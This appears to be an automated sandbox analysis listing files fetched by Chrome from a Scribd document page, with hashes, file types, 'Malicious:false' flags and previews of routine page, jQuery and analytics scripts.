                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.scribd.com/options/exposed_to_client.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:. if (!window.Scribd) Scribd = {};. Scribd.Brand = 'scribd';. Scribd.NwayTestsWithWeights = {"doc_page_pass_hashed_email_2024_q1":{"id":2717,"choices":{"6902":{"name":"control","weight":50},"6903":{"name":"test","weight":50}}},"doc_page_pmp_boosting_c":{"id":2868,"choices":{"7327":{"name":"control","weight":1},"7328":{"name":"pmp_top_2","weight":0},"7329":{"name":"pmp_alternate","weight":0},"7330":{"name":"fixed_pmp_boost_moderate","weight":0},"7331":{"name":"fixed_pmp_boost_above","weight":0},"7332":{"name":"signup_ranking","weight":0}}},"scribd_top_level_category_pages":{"id":3040,"choices":{"7941":{"name":"control","weight":1},"7942":{"name":"test","weight":0}}},"scribd_rebrand":{"id":3049,"choices":{"8001":{"name":"control","weight":1},"8002":{"name":"true","weight":0}}},"doc_page_adsense_vs_house_q4":{"id":3085,"choices":{"8115":{"name":"control","weight":1},"8116":{"name":"test","weight":1}}},"recs_semantic_embedding_c":{"id":2103,"choices":{"5171":{"name":"control
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (59996)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1778653
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0046165033608645
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:uMUmkjFcmmz29zENBbyEppLpBpuhpuLpapqpNpLpPpCN:o
                                                                                                                                                                                                                                                                                                                                                                                        MD5:226977CE1CBCEA213EC26DD6EAD9FCFF
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1EAEFCA7F636876132EB503A463B82FDB4056FF0
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:31B924434B3DE26C45C679B80DDF1BA640F8BCB401B6E44B642134C3AD653183
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1BF58FBE06F59239A61B8038A39F2B0D0831C6CA8FB2891238E7F03FF53636A776724F5912B0ED7140FEA19443D54B45B878A86C69F2A9C412FAE08BACA47BC7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<!DOCTYPE HTML><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><head prefix="og: http://ogp.me/ns# scribd-com: http://ogp.me/ns/apps/scribd-com#"><link rel="preconnect" href="https://s-f.scribdassets.com/"><link rel="preconnect" href="https://html.scribdassets.com"><link rel="preload" crossorigin="anonymous" href="https://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/regular/source_sans_pro_regular.latin.e8ecbdac.woff2" as="font" type="font/woff2"><link rel="preload" crossorigin="anonymous" href="https://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/semibold/source_sans_pro_600.latin.76017e81.woff2" as="font" type="font/woff2"><link rel="preload" href="https://cmp.osano.com/AzZdHGSGtpxCq1Cpt/4e10b135-d113-4574-a477-270ace40bba7/osano.js?language=en" as="script"><script>window.Scribd = window.Scribd || {}; window.Scribd.config = {"js_logging_enabled":fa
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YHAXW2Vn:YglVn
                                                                                                                                                                                                                                                                                                                                                                                        MD5:97EFE0B7EE61E154D57E80758BB797D8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:810B4E115FE9F5AE697666FEBF2A9ABF0B21C9EC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EFABBA3678B85FCAB831B778EA2DDAAD1E2A1E952584D3566BC39B7CCB3429D9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:AA02209CF80FC2564CE0DB0BF9F30241E92EA33101B55FFE5E26D617F90B74277AE68D714A7B00C792EF2B88B582E3F299213A5C3C9BF9AFE6C6C1800FC276AF
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://rp.liadm.com/j?dtstmp=1733522365790&aid=a-05td&se=e30&duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&tv=v3.5.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&us_privacy=1-N-&wpn=lc-bundle&wpv=v3.5.0&cd=.scribd.com&c=PHRpdGxlPkFkdmljZSBOb3RpZmljYXRpb24gfCBQREY8L3RpdGxlPjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJBZHZpY2UgTm90aWZpY2F0aW9uIC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgdmlldyBwcmVzZW50YXRpb24gc2xpZGVzIG9ubGluZS4gQWR2aWNlIE5vdGlmaWNhdGlvbiI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODAxNTE5MjkxL0FkdmljZS1Ob3RpZmljYXRpb24iPjx0aXRsZSBpZD0iNmEzMGQ0MDktNGUyNi00ODQyLWFkNzEtYjFhZDA4ZDE5MzczIj48IS0tLS0-Q2xvc2UgdGhpcyBkaWFsb2c8IS0tLS0-PC90aXRsZT48dGl0bGUgaWQ9ImNkMjJlYmIwLTc2ZTctNDkxOS04OGUzLTViMmE2MWM1MDM4OCI-PCEtLS0tPkNsb3NlIENvb2tpZSBQcmVmZXJlbmNlczwhLS0tLT48L3RpdGxlPg&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4&n3pc=true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:{"bakers":[]}
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 904x639, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4836
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.884645998277707
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:sv1QgrFcuVhCUbqDQSccZc7q8Vh9VJXGroA+R+aA7fwJHwrqC5buIDUx6XV2AHg:sYq+GfJqoAOK7fcHyFb/i6l2AA
                                                                                                                                                                                                                                                                                                                                                                                        MD5:44F92912B8B0F94CE8D94D184B6D55F9
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E0D7849FD1CADC44859BECF3B8226B5BA3213BE6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5FC37D726169FB607160FEE9B230E3A92F90DF2EC6170F49339289C6CBE35730
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:42B165EA404E87E9C343BEC47A532E8E9F67C1D934C4CE05DE52450ADCE67C98714F135C80B7509312EB69DB18A26C1237198E22EA8CF14ED7B05DC9E69C5127
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://html.scribdassets.com/975ow02iyodmurb1/images/1-4596bc3e1d.jpg
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8 .........*....>.N.M..#" t.X...gn.h/.../....+.W..y.E.p....3.~.....+._._.'J/0...._.=o.k......a................M..(...>.x.z.v,.uE.e.<T........I.JS...8p.....N.8p....8p....8vz(.t.dA...:t..N.:t..N.v...b.n[7..8p....8p....8vz(.t..O..:'.$.. @..... @........9...D....... @...g.0.W. .,P~t..N.:t..N.:u../x.'.......N.:t..N.:u....,Y'....G..... @..... @...g.S.j.,..oI.... @..... @.....q......N.:t..N.:t...b.....Y"Qz@@..... @..... .,..Gh ..l.9N.8p....8p...g.tTN4.f1..:'.$.. @.....A.3.sU.....b..N.:t..N.:t.. ..N.v......8p....8p...*.S.".....N......pf..4.....^q..:'.$.^.Y._.+M.b..N..\G.H...... A.X.[5.... FU....8p........k..\.Z.C2.j.. @..4...J.....^l.q.>.. @...... @... ....[.z...>Ks..X$na.?{t......0...k........`Vw4..ek...I.... @........Bf.DY6,..'2......wB.K..s...)....8x6..:'.$.. @..... .,b..?...y.3..y.aNP.d..Jca...P...[.....@....v6.=t..!....R`-H,X.b..,X.b..N.:....q.c.#M......s5..{:2...... @..... @.......".|..tb..$.. @..... @........ E.:N
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):220
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.097050793253651
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:qzhZhqVHN+AoSazTBxYT1ADKLfgSazTGxILBADKL9U3pTGnezIXF6UuDtTBzkGc0:qxswnzfYTKsyzKx22s9IKnezqF63S+9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:1EFF6EFEAC587CFF43F6DD5A15851140
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5A8CD76AB7426218B6735FD72F57C3EEACF19A07
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9CC64F778AF120796DBA543FCE013CD76290930948C0BE1BB3EACFACFA311500
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E2B29997C7E3A5B54BBF5931FF20C4998250FB2AC63705C66000717CFD004D4B28BE38BF9637E56E39374EC0E7F480A25BB2D6BBC152BA497DFE40A82BAAA3C3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://survey.survicate.com/workspaces/7de87bc73aff1974945059e230fb953d/web_surveys.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:var _sTrackingAlreadyPresent=(typeof window._svd!=='undefined'&&typeof window._svc!=='undefined');var _svc=window._svc||{};var _svd=window._svd||{};_svc.workspaceKey=_svc.workspaceKey||'7de87bc73aff1974945059e230fb953d';
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (52336)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):358492
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.416267305320949
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:8JVbgSFY0KxwEDA1OYgeaBrWf135TePFc6:MJkDAgYg092
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4285228A39327D6DBB0FD0F66DCE15A0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1961E95AFC4325B27695EC8A9D78CFC187B1AB9B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3606C679D28F0B91FF876C8648271304AE6D140B645F4E89FFF5B7678B62D01D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BB0936C9B3E9C20F13630BCCC6EF5DF4FEB62E2B654B2BE90DD0BEDD796C5CB6FDD54904C320A81B94124BE38E9D00B2CD6170A1D4578AA340C6800FBECFD2D3
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://analytics.tiktok.com/i18n/pixel/static/main.MTBlZWM4ZGM2MQ.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){"use strict";function t(){t=function(){return e};var e={},r=Object.prototype,n=r.hasOwnProperty,o="function"==typeof Symbol?Symbol:{},i=o.iterator||"@@iterator",a=o.asyncIterator||"@@asyncIterator",c=o.toStringTag||"@@toStringTag";function u(t,e,r){return Object.defineProperty(t,e,{value:r,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{u({},"")}catch(t){u=function(t,e,r){return t[e]=r}}function l(t,e,r,n){var o=e&&e.prototype instanceof p?e:p,i=Object.create(o.prototype),a=new I(n||[]);return i._invoke=function(t,e,r){var n="suspendedStart";return function(o,i){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===o)throw i;return T()}for(r.method=o,r.arg=i;;){var a=r.delegate;if(a){var c=g(a,r);if(c){if(c===s)continue;return c}}if("next"===r.method)r.sent=r._sent=r.arg;else if("throw"===r.method){if("suspendedStart"===n)throw n="completed",r.arg;r.dispatchException(r.arg)}else"return"===r.method&&r.abrupt("return",r.arg);
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):51385
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.293328685395304
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:IaOFhhRC5JFhLjfRysgLzQynDw5YyDMFW8KQ:IaOFnR2DRszQKaoWtQ
                                                                                                                                                                                                                                                                                                                                                                                        MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):9306
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.97640109073449
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:GooSFNvLgprwh3aFtfKrIPJdQPUHmiMKtmj6FAQ/LQz1/M+JDjy3:GooSjKrdfKoJmPUHmHwFAQ/LQ9JDj2
                                                                                                                                                                                                                                                                                                                                                                                        MD5:41AC4FF342C67470925C9A46723ACC9E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:BA949925AC19D457201AE4E59D0DA25438EFFEA9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4DE447C33F8A133B4F0CB94D04F20224BA8017AE6390C3844AADA45DA3AD3C26
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:19E1F92F19AA5D9F0DE7855FF053FB5940F08EA526816E8762C0237D64449844491C88873DB61BBDD89953E844B6820DB9F7A8F9D210B9F8927E7A2E2B2C6F17
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-1-f.scribdassets.com/img/word_document/356032151/149x198/db7a11388a/1731623834?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFFR$..WEBPVP8 F$..pw...*....>e(.E."....@.D..`..%;......*V...i.?.....i.G........H.....?..._....?T.......+........O...?......n.m.U.o.../... ..........Y...#.....S...G...../...o....s.@...T...'.^_.$.....?}......|Y......?../.........^...........7.?....H...%......>.>....../.......v....u8...m..x.[(..^>..D.....&;....B$...w...M@..<R.bs..D..W_..v..v.X...O3.~v.../....!C....E<jp.............S.(..S.....4......3..*^.1!b`.....>..Z..5..b._U,.Z.....|....qV9GRr...f5b..&q.....v...cJ..oJR...K....+.....d.n.~......":...H._g~....U..,.Tj.C.<...:..Xd...jr=..8.R5Q_..$..Q..'.sf...)..cq=...c.....{..=w._....}R`@.x/^.._E.s.?..D..-....c....+.....!.?...FxJ.W.}m>R9....x.F..).uH..A#Z\...N.$.Wt..j..Pt.z...0...h...^.....X.B\.M......5.h...7.~/.`9.H..U.g.zs.y...`~...zT.{..oG....)..3.'..n(......*.UZ.,.P"/..#....R....E2S|..>s...d...By....1*.%V...)......L.-.U<E..)....O..._.vB.I..6<.VI.z.....F.5&.....-...f6./....(-..e..9TB..|.6..m..Z...R.^.............le...Y..}..HF.VU.......N...}...J
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (56091), with NEL line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):138354
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.399375037370076
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:pE/n3NMDJKBoo1R2fgjbucRrie5ow+UmUVvKTqUsunwLnN80/WuOm1WdGsFGDj:Yn9MDJKBoL4jycNie5oW82UsuiFtsm
                                                                                                                                                                                                                                                                                                                                                                                        MD5:26765DE6F4BD393878D51D4DB837BD7B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:34062962B7C2B5FC027173B96105319FF04423F7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:ED7FA56DA9E21F70633599C8ED9E20907CFEFB572F17796078E3977B11E60854
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C5F561F808059F283F498A5A07CED3BE5B518E6E46CB157965935D92708A5FCA26E62B3B6D1C3C34C554BF83AFCD1113A1467CB3C7D8C6E81E74C437D13826FE
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:!function(){window.LI={"appId":"a-05td","advertiserId":32024,"sync":true,"euns":false,"identifiersToResolve":"_aalyticsuid,trc_cookie_storage,dtm_token,_pubcid,hid,muuid,globalTI_SID,ajs_user_id,_li_uuid,s_ecid,_shopify_y,gup_anonid,s_vi,IXWRAPPERLiveIntentIp,_parrable_id,tmguid,_sharedid,dsq__u,dsq__s","contextSelectors":"title,meta[name='description'],h1,link[rel='canonical']","contextElementsLength":5000,"urlCollectionMode":"full"}}();!function(){"use strict";var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function t(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}var n=function(e){try{return!!e()}catch(e){return!0}},r=!n((function(){var e=function(){}.bind();return"function"!=typeof e||e.hasOwnProperty("prototype")})),o=r,i=Function.prototype,s=i.call,a=o&&i.bind.bind(s,s),l=o?a:function(e){return function(){return s.apply(e,arguments)}},c=fu
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):293797
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5617905066033035
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:/w3OdmnxuK3frWdCd0YMRoIbpgADF8lTPfD5J312KQm9pYRGPVytqPPsG:IduK3zWCEz+BRxpYRGPVyAXR
                                                                                                                                                                                                                                                                                                                                                                                        MD5:30E8F99C1D5E03E915FE387A3DDFC10C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8CF47164F82BFCE262D416AF419C5B073C1B6DDF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3B158FA5450FA1ADB6B45FA597F3283A5C32A950F134B937C8B4E14B214DB8F7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8E52C904514F3A5A1C62F5DEFC62C6B140818B7B4A3BB1E72FCB56D7DEA37AA40FB137AAE045533C9A3113F5B0C374AE388C02A33B9C381FA36569E3A97A23D0
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/destination?id=AW-991817613&l=dataLayer&cx=c&gtm=45He4c40v78386455za200
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-991817613","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regi
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YHAXW2Vn:YglVn
                                                                                                                                                                                                                                                                                                                                                                                        MD5:97EFE0B7EE61E154D57E80758BB797D8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:810B4E115FE9F5AE697666FEBF2A9ABF0B21C9EC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EFABBA3678B85FCAB831B778EA2DDAAD1E2A1E952584D3566BC39B7CCB3429D9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:AA02209CF80FC2564CE0DB0BF9F30241E92EA33101B55FFE5E26D617F90B74277AE68D714A7B00C792EF2B88B582E3F299213A5C3C9BF9AFE6C6C1800FC276AF
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:{"bakers":[]}
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (32012)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):69597
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.369216080582935
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                                                                                                                                                                                                                                                                        MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                                                                                                                                        MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
